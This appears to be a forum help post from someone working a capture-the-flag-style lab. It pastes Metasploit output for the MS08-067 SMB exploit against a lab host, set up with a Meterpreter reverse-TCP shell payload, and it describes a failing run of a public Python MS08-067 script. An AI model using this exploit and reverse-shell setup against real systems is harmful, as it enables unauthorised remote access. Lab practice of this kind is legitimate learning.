msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 10.10.16.192:4444
[-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (10.10.10.4:445) timed out.
[] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > uname -a
[*] exec: uname -a
Linux kali 5.10.0-kali9-amd64 #1 SMP Debian 5.10.46-1kali1 (2021-06-25) x86_64 GNU/Linux
msf6 exploit(windows/smb/ms08_067_netapi) >
As you can see my LHOST is set to tun0, and my VM configuration is set to bridged. What am I missing here.
Also, I tried to use the manual expoit for this box.
I download and ran the python script.
┌──(kali㉿kali)-[~/Downloads/ms08_067-master]
└─$ ./ms08_067_2018.py 10.10.10.4 6 4
Install the following library to make this script work
Impacket : GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
PyCrypto : pycrypto · PyPI
┌──(kali㉿kali)-[~/Downloads/ms08_067-master]
I download and installed both and re ran the script and get the same results.
please assist.